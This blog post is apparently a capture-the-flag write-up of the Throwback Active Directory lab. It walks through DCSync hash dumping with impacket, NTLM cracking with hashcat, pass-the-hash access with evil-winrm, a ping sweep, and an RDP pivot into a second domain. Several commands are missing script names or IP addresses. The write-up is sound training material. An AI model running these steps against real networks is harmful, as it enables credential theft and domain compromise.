Throwback — Part 7 — THROWBACK-DC01, CORP-DC01, CORP-ADT01

After we have access to the Domain Controller, it is time to extend our privileges.


To successfully do this attack, the attacker will first discover a Domain Controller. After that the attacker will request for user replication. Finally the targetted domain controller will send back user data, including password hashes.

In order to perform this attack, the attacker needs Replicating Directory Changes and Replicating Directory Changes All rights. Normally, Domain Admins and Enterprise Admins have these rights. But there is also a Bloodhound query, that will show us accounts with these rights.

In this case the Backup user has rights to perform a DCSync attack, even though he is not Administrator. This can be done because the needed rights can be given to any account individually. The credentials for the Backup account can be found in the Documents folder of JeffersD:

Now we can perform the DCSync attack by utilizing “” from impacket. With the following command it is possible to retrieve password hashes:

proxychains python3 /usr/share/doc/python3-impacket/examples/ -dc-ip THROWBACK/backup@

Cracking the hashes

hashcat.exe -m 1000 -a 0 hash.txt rockyou.txt -r rules\OneRuleToRuleThemAll.rule

The mode for the hashes is 1000, because these hashes are NTLM hashes. I was able to crack the password for MercerH. After analyzing the account on Bloodhound, we can see that this is a domain admin and has a flag in his description property:


Next I have connected to the domain controller with Evil Winrm as MercerH:

proxychains evil-winrm -u MercerH -H MERCERH_HASH -i

Then I could retrieve the root flag:

Next I have started a Ping Sweep to discover which hosts we can connect to. I was able to discover a new host:

1..255 | % {"10.200.70.$($_): $(Test-Connection -count 1 -comp 10.200.70.$($_) -quiet)"}

After getting the hostname of the machine, it looked like it was inside the other domain “CORPORATE.local”:


Crossing the trust

proxychains xfreerdp /v: /u:THROWBACK\\MercerH  /p:MERCERH_PASSWORD +clipboard

After I was on the host, I have connected via RDP to the Corporate DC by using MercerH user:

Then I could get the user and root flag on the Corporate DC:

During enumeration I was able to find an interesting file called “server_update” inside the Administrator’s Documents directory:


During enumeration of the host, I was able to spot an interesting file called “email_update.txt” inside DosierK’s documents folder:

Hey team! Hope you guys are having a good day!

As all of you probably already now we are transferring to our new email service as we
transition please use the new emails provided to you as well as the default credentials
that can be found within your emails.

Please do not use these emails outside of corporate as they contain sensitive information.

The new email format is based on what department you are in:

In order to access your email you will need to go to mail.corporate.local as we get our
servers moved over.

If you do not already have mail.corporate.local set in your hosts file please reach out to
IT to get that fixed.

Please remain patient as we make this transition and please feel free to email me with any
questions you may have regarding the new transition:

Karen Dosier,
Human Relations Consulatant


MercerH should use a more complex password.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

Passionate about Cyber Security. I am publishing CTF Writeups and Cybersecurity Content!